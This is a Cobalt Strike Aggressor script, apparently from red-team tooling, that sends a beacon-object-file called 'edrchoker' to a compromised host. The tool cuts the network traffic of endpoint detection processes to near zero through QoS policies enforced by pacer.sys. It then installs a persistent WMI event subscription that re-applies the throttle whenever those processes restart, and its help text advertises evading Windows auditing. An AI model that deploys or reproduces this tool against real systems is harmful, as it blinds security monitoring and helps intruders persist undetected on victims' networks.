# edrchoker.cna — Aggressor script for edrchoker BOF
#
# Throttle EDR/process network to 8 bps via pacer.sys QoS +
# install a persistent WMI watchdog that re-throttles on restart.
#
# Usage:
#   edrchoker elastic.exe;MsSense.exe   throttle + install WMI watchdog
#   edrchoker remove Explorer.exe       restore network for specific process
#   edrchoker remove                    restore all + remove WMI watchdog

alias edrchoker {
    local('$bof $args $bid $handle $path $mode $procs');
    $bid  = $1;
    $path = script_resource("edrchoker.x64.o");

    $handle = openf($path);
    if ($handle is $null) {
        berror($bid, "[edrchoker] Cannot open: " . $path);
        return;
    }
    $bof = readb($handle, 1048576);
    closef($handle);
    if ($bof is $null) {
        berror($bid, "[edrchoker] readb failed for: " . $path);
        return;
    }
    println("[edrchoker] loaded " . strlen($bof) . " bytes from " . $path);

    if (size(@_) == 1) {
        # No args — remove all policies + watchdog
        $mode  = 2;
        $procs = "";
        btask($bid, "EDRChoker: restoring ALL — removing QoS policies + WMI watchdog");

    } else if ($2 eq "remove" && size(@_) == 2) {
        # edrchoker remove — remove all
        $mode  = 2;
        $procs = "";
        btask($bid, "EDRChoker: restoring ALL — removing QoS policies + WMI watchdog");

    } else if ($2 eq "remove" && size(@_) >= 3) {
        # edrchoker remove proc1.exe;proc2.exe — restore specific
        $mode  = 1;
        $procs = $3;
        btask($bid, "EDRChoker: restoring network for -> " . $3);

    } else {
        # edrchoker proc1.exe;proc2.exe — throttle + watch
        $mode  = 0;
        $procs = $2;
        btask($bid, "EDRChoker: throttling + installing watchdog -> " . $2);
    }

    # i = int32 (mode), Z = null-terminated wide string (process list)
    $args = bof_pack("iZ", $mode, $procs);
    beacon_inline_execute($bid, $bof, "go", $args);
}

beacon_command_register(
    "edrchoker",
    "Throttle process(es) to ~0 bps via QoS (pacer.sys) + WMI watchdog",
    "Usage:\n" .
    "  edrchoker p1.exe;p2.exe    throttle now + install WMI auto-re-throttle on restart\n" .
    "  edrchoker remove p1.exe    restore network for specific process\n" .
    "  edrchoker remove           restore ALL + remove WMI watchdog\n\n" .
    "Mechanism:\n" .
    "  QoS:  MSFT_NetQosPolicySettingData -> pacer.sys enforces below WFP\n" .
    "        No WFP event 5447, no driver, no injection\n" .
    "  Watch: WMI permanent subscription (ROOT\\subscription)\n" .
    "        VBScript fires in WmiPrvSE.exe on process start — no child spawned\n\n" .
    "Verify throttle:   Get-WmiObject -Ns ROOT\\StandardCimv2 -Class MSFT_NetQosPolicySettingData\n" .
    "Verify watchdog:   Get-WmiObject -Ns ROOT\\subscription -Class __EventFilter\n" .
    "Test restore:      edrchoker remove Explorer.exe  then ping google.com from Explorer.exe"
);
